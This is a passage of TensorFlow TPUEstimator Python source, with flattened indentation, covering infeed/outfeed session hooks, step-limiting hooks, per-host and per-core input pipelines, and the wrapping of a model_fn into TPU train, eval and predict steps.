if self.host_call is not None:
host_calls['host_call'] = self.host_call
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=self.loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=hooks,
evaluation_hooks=hooks,
prediction_hooks=hooks)
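# Illustrative sketch (added comment, not part of the TensorFlow source): one way a
# user model_fn might wire up `eval_metrics`; `my_metric_fn`, `labels`, and `logits`
# are placeholder names.
#
#   def my_metric_fn(labels, logits):
#       predictions = tf.argmax(logits, 1)
#       return {'accuracy': tf.metrics.accuracy(labels, predictions)}
#
#   return TPUEstimatorSpec(
#       mode=mode, loss=loss, train_op=train_op,
#       eval_metrics=(my_metric_fn, [labels, logits]))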
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
logging.debug('%s read iterations %s', self._name, iterations)
if iterations == _SIGNAL.STOP:
logging.info('%s received shutdown signal, stopping.', self._name)
return
yield iterations
def join(self):
logging.info('Shutting down %s thread.', self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initialize and shutdown TPU system.
2. launch and join the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
run_infeed_loop_on_coordinator=True):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
self._session_cancel_timer = None
self._feed_error = None
self._finished = False
def begin(self):
logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
self._init_ops = [tpu.initialize_system(job=self._master_job)]
self._finalize_ops = [tpu.shutdown_system(job=self._master_job)]
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _log_error(self, session, error):
"""Log an infeed or outfeed error.
This logs a short error message immediately, and schedules a timer to
emit the full stack trace and error message after a short period of time.
If the main session has terminated by the time the timer triggers, we
assume the real source of the error was from the main session and avoid
emitting a stack trace for the infeed.
Args:
session: `tf.Session`, session to be terminated.
error: the exception that triggered logging.
"""
logging.warning(
'\n\n'
'Error occurred during infeed/outfeed. This may be due to a compile '
'error in the main session. Waiting for a short time for the main '
'session to come back.\n\n%s', error)
self._feed_error = traceback.format_exc()
# If we've already encountered a feed error, don't schedule another
# cancellation op.
if self._session_cancel_timer:
return
def _cancel_session():
# Close the session to avoid the main thread from hanging. If input
# pipeline triggers any error, the infeed thread dies but the main thread
# for TPU computation waits for the infeed enqueue forever. Close the
# Session to cancel the main thread Session.run execution.
#
# We sleep for a few seconds before closing to give some time
# for any TPU compilation error to propagate from the TPU to the CPU
# host. Compilation errors should be reported by the main thread so that
# the program can be interrupted and users can take action. Due to a race
# condition, the infeed thread might see an error first. Closing the
# session here immediately would result in a session cancellation
# exception in the main thread, instead of the expected compile error.
# User code that depends on having the proper exception type will
# therefore be confused.
time.sleep(5)
# If the main session is still running, the infeed/outfeed errors are
# legitimate, and should be logged.
if not self._finished and self._feed_error:
logging.error('Feed error: %s', self._feed_error)
logging.error('Closing session. A RuntimeError should follow.')
session.close()
self._session_cancel_timer = threading.Thread(target=_cancel_session)
self._session_cancel_timer.daemon = True
self._session_cancel_timer.start()
def _run_infeed(self, queue_ctx, session):
logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
logging.info('Infeed thread sleeping for %d seconds.',
self._initial_infeed_sleep_secs)
time.sleep(self._initial_infeed_sleep_secs)
logging.info('Infeed thread starting after sleep')
try:
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Infeed enqueue for iteration (%d, %d)', count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
logging.info('Infeed thread finished, shutting down.')
except Exception as e: # pylint: disable=broad-except
self._log_error(session, e)
def _run_outfeed(self, queue_ctx, session):
logging.info('Starting outfeed thread controller.')
try:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i)
session.run(self._dequeue_ops)
logging.info('Outfeed thread finished, shutting down.')
except Exception as e: # pylint: disable=broad-except
self._log_error(session, e)
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def after_create_session(self, session, coord):
logging.info('Init TPU system')
session.run(self._init_ops,
options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000))
logging.info('Start infeed thread controller')
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
logging.info('Start outfeed thread controller')
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
def before_run(self, run_context):
self._feed_error = None
# Wait for the cancellation timer to complete before continuing.
if self._session_cancel_timer:
self._session_cancel_timer.join()
self._session_cancel_timer = None
iterations = run_context.session.run(self._iterations_per_loop_var)
logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations)
self._infeed_controller.send_next_batch_signal(iterations)
logging.info('Dequeue next (%d) batch(es) of data from outfeed.',
iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
if self._session_cancel_timer:
logging.warning('Feed error occurred; waiting for message.')
self._session_cancel_timer.join()
self._finished = True
logging.info('Stop infeed thread controller')
self._infeed_controller.join()
logging.info('Stop output thread controller')
self._outfeed_controller.join()
logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self, ctx, enqueue_ops, dequeue_ops):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx, enqueue_ops, dequeue_ops, run_infeed_loop_on_coordinator=False)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with
the following differences for TPU training:
1. This hook sets the variable for iterations_per_loop, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved to avoid race
condition.
"""
def __init__(self, iterations, num_steps=None, last_step=None):
"""Initializes a `StopAtStepHook`.
Args:
iterations: The number of iterations to run optimizer per training loop.
num_steps: Number of steps to execute.
last_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and last_step is None:
raise ValueError('One of num_steps or last_step must be specified.')
if num_steps is not None and last_step is not None:
raise ValueError('Only one of num_steps or last_step can be specified.')
self._num_steps = num_steps
self._last_step = last_step
self._iterations = iterations
def _next_iterations(self, global_step, last_step):
gap = last_step - global_step
return min(gap, self._iterations)
def begin(self):
self._global_step_tensor = training_util.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
global_step = session.run(self._global_step_tensor)
if self._last_step is None:
self._last_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(iterations, session=session)
def after_run(self, run_context, run_values):
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._last_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
class _SetEvalIterationsHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(session_run_hook.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
# This is not necessary as we do not run infeed enqueue and outfeed dequeue
# in side threads for the prediction model, but it makes
# TPUInfeedOutfeedSessionHook print a nicer message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
# immediately
raise errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(ctx, input_fn,
inputs_structure_recorder):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
inputs = _Inputs.from_input_fn(input_fn())
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
'per-Core input pipeline deployment. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_configuration_from_sharded_input_tensors(
per_host_sharded_inputs)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=ctx.tpu_ordinal_function)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
hooks = []
with ops.device(device):
inputs = _Inputs.from_input_fn(input_fn())
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset, batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
hooks.append(inputs.dataset_initializer_hook())
# TODO(ylc): Refactoring the code to merge the tpu ordinal logic here and the
# _TPUContext.tpu_ordinal_function. We should either introduce another
# abstraction or a different helper method.
def _tpu_ordinal_function_impl(shard_index_in_host):
# We put both enqueue/dequeue op at tpu.core(0) in each replica.
replica = ctx.device_assignment.lookup_replicas(
host_id, (0, 0, 0))[shard_index_in_host]
return ctx.device_assignment.tpu_ordinal(replica=replica)
if ctx.model_parallelism_enabled:
tpu_ordinal_function = _tpu_ordinal_function_impl
else:
tpu_ordinal_function = None
def enqueue_ops_fn():
with ops.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels, signals)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset
def generate_per_host_v2_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
del host_id # unused
captured_infeed_queue = _CapturedObject()
hooks = []
with ops.device(device):
inputs = _Inputs.from_input_fn(input_fn())
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
# TODO(b/XXX): Add predict support for PER_HOST_V2
raise TypeError('Mode PREDICT is not yet supported in PER_HOST_V2 mode.')
hooks.append(inputs.dataset_initializer_hook())
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
num_replicas_per_host = ctx.num_of_replicas_per_host
with ops.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for _ in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
with ops.control_dependencies(control_deps):
features, labels = inputs.features_and_labels() # Calls get_next()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_configuration_from_sharded_input_tensors(
per_host_sharded_inputs)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=ctx.tpu_ordinal_function)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in `_TPUContext`, it
invokes `input_fn` for all cores (usually multi-host TPU training) or for one
host (usually for single-host TPU evaluation), and sends all `features` and
`labels` returned by `input_fn` to TPU infeed. For per-core invocation,
`features` and `labels` are piped to infeed directly, one tuple for each
core. For per-host invocation, `features` and `labels` are split at host
(with respect to `batch_axis`) and piped to all cores accordingly.
Flattening and unflattening are also handled by `_InputPipeline`. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
may expect multiple `features` and `labels` tuples, one for each core.
TPUEstimator allows various different structures for inputs (namely `features`
and `labels`). `features` can be `Tensor` or dict of string name to `Tensor`,
and `labels` could be `None`, `Tensor`, or dict of string name to `Tensor`.
TPU infeed/outfeed library expects flattened tensor list. So, `features` and
`labels` need to be flattened before infeed enqueue, and their structure needs
to be recorded so it can be restored after infeed dequeue (a short illustrative
sketch follows the recorder class below).
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self):
# Holds the structure of inputs
self._feature_names = []
self._label_names = []
self._has_labels = False
self._signals_helper = None
# Internal state.
self._initialized = False
def has_labels(self):
return self._has_labels
def validate_and_record_structure(self, features, labels, signals=None):
"""Validates and records the structure of features` and `labels`."""
def _extract_key_names(tensor_or_dict):
if tensor_or_dict is None:
return []
return sorted(tensor_or_dict.keys()) if isinstance(
tensor_or_dict, dict) else []
# Extract structure.
has_labels = labels is not None
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if signals is not None and self._signals_helper is None:
# Record signals helper.
self._signals_helper = _SignalsHelper(signals)
if self._initialized:
# Verify the structure is the same. The following should never happen.
assert feature_names == self._feature_names, 'feature keys mismatched'
assert label_names == self._label_names, 'label keys mismatched'
assert has_labels == self._has_labels, 'label presence mismatched'
else:
# Record structure.
self._initialized = True
self._feature_names = feature_names
self._label_names = label_names
self._has_labels = has_labels
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
flattened_inputs = []
if self._feature_names:
# We need a fixed ordering for enqueueing and dequeueing.
flattened_inputs.extend(
[features[name] for name in self._feature_names])
else:
flattened_inputs.append(features)
if labels is not None:
if self._label_names:
# We need a fixed ordering for enqueueing and dequeueing.
flattened_inputs.extend([labels[name] for name in self._label_names])
else:
flattened_inputs.append(labels)
if signals is not None:
flattened_inputs.extend(_SignalsHelper.as_tensor_list(signals))
return flattened_inputs
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have identical structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
expected_num_features = (
len(self._feature_names) if self._feature_names else 1)
if self._has_labels:
expected_num_labels = (
len(self._label_names) if self._label_names else 1)
else:
expected_num_labels = 0
expected_num_signals = (
self._signals_helper.num_signals if self._signals_helper else 0)
expected_num_tensors = (
expected_num_features + expected_num_labels + expected_num_signals)
if expected_num_tensors != len(flattened_inputs):
raise ValueError(
'The number of flattened tensors does not match the expected number. '
'Expected {}, got {}'.format(expected_num_tensors,
len(flattened_inputs)))
if self._feature_names:
unflattened_features = dict(
zip(self._feature_names, flattened_inputs[:expected_num_features]))
else:
# Single tensor case
unflattened_features = flattened_inputs[0]
if expected_num_labels == 0:
unflattened_label = None
elif self._label_names:
label_list = flattened_inputs[
expected_num_features:expected_num_features + expected_num_labels]
unflattened_label = dict(zip(self._label_names, label_list))
else:
# Single tensor case.
unflattened_label = flattened_inputs[expected_num_features]
signals = None
if expected_num_signals != 0:
tensor_list_for_signals = flattened_inputs[
expected_num_features + expected_num_labels:]
signals = self._signals_helper.unflatten(tensor_list_for_signals)
return _Inputs(unflattened_features, unflattened_label, signals=signals)
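# Illustrative sketch (added comment, not part of the TensorFlow source): the
# recorder's flatten/unflatten round trip, with placeholder tensors x, y and lbl.
#
#   recorder = _InputPipeline.InputsStructureRecorder()
#   recorder.validate_and_record_structure({'x': x, 'y': y}, lbl)
#   flat = recorder.flatten_features_and_labels({'x': x, 'y': y}, lbl)  # [x, y, lbl]
#   inputs = recorder.unflatten_features_and_labels(flat)
#   features, labels = inputs.features_and_labels()  # ({'x': x, 'y': y}, lbl)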
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_TPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder()
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
# While tf.while_loop is called, the body function, which invokes
# `enqueue_fn` passed in, is called to construct the graph. So, input_fn
# structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_hooks = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
# Invoke input pipeline for each core and placed on the corresponding
# host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
else:
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset = (
generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id))
else:
enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
all_hooks.extend(hooks)
# NOTE(xiejw): We dispatch here based on the return type of the
# users `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should be always safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if is_dataset:
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
# infeed_queue is used to generate dequeue ops. The only thing it uses for
# dequeue is dtypes and shapes. So, any one can be used. Here, grab the
# first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, all_hooks, run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
# Perform some sanity checks to log user friendly information. We should
# error out to give users better error message. But, if
# _WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
# user code, so, log a warning.
if ops.get_default_graph().get_collection(ops.GraphKeys.QUEUE_RUNNERS):
err_msg = ('Input pipeline contains one or more QueueRunners. '
'It could be slow and not scalable. Please consider '
'converting your input pipeline to use `tf.data` instead (see '
'https://www.tensorflow.org/programmers_guide/datasets for '
'instructions).')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
This makes calling model_fn on CPU and TPU easier and more consistent and
performs necessary check and mutation required by TPU training and evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat many times and then replicated to
all TPU shards. Besides, the input should be taken from TPU infeed rather
than input pipeline (input_fn) directly. To fit TPU loop and replicate
pattern, the original train computation should be reformed, which is the
returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of train_fn, host_calls, and captured scaffold_fn. The train_fn
representing the train step for TPU.
"""
host_call = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
def train_step(loss):
"""Training step function for use inside a while loop."""
del loss # unused; required in function signature.
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if isinstance(estimator_spec, TPUEstimatorSpec):
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
# We must run train_op to update the variables prior to running the
# outfeed.
with ops.control_dependencies([train_op]):
host_call_outfeed_ops = []
if (isinstance(estimator_spec, TPUEstimatorSpec) and
estimator_spec.host_call is not None):
host_call.record({'host_call': estimator_spec.host_call})
host_call_outfeed_ops = host_call.create_enqueue_op()
with ops.control_dependencies(host_call_outfeed_ops):
return array_ops.identity(loss)
return train_step, host_call, captured_scaffold_fn
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
For TPU evaluation, an eval (computation) step is first wrapped in a
tf.while_loop control flow to repeat many times and then replicated to
all TPU shards. Besides, the input and output are slightly different. Input,
features and labels, should be taken from TPU infeed rather than input
pipeline (input_fn) directly. Output is managed in two stages. First, the
model outputs as the result of evaluation computation, usually model logits,
should be transferred from TPU system to CPU. Then, all model outputs are
concatenated first on CPU and sent to the metric_fn for metrics computation.
To fit TPU evaluation pattern, the original eval computation should be
reformed, which is the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of eval_fn, host_calls, and captured scaffold_fn. The eval_fn
representing the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, TPUEstimatorSpec):
raise RuntimeError(
'estimator_spec used by TPU evaluation must have type '
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
to_record = {}
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return math_ops.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of predict_fn, host_calls, and captured scaffold_fn. The
predict_fn representing the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
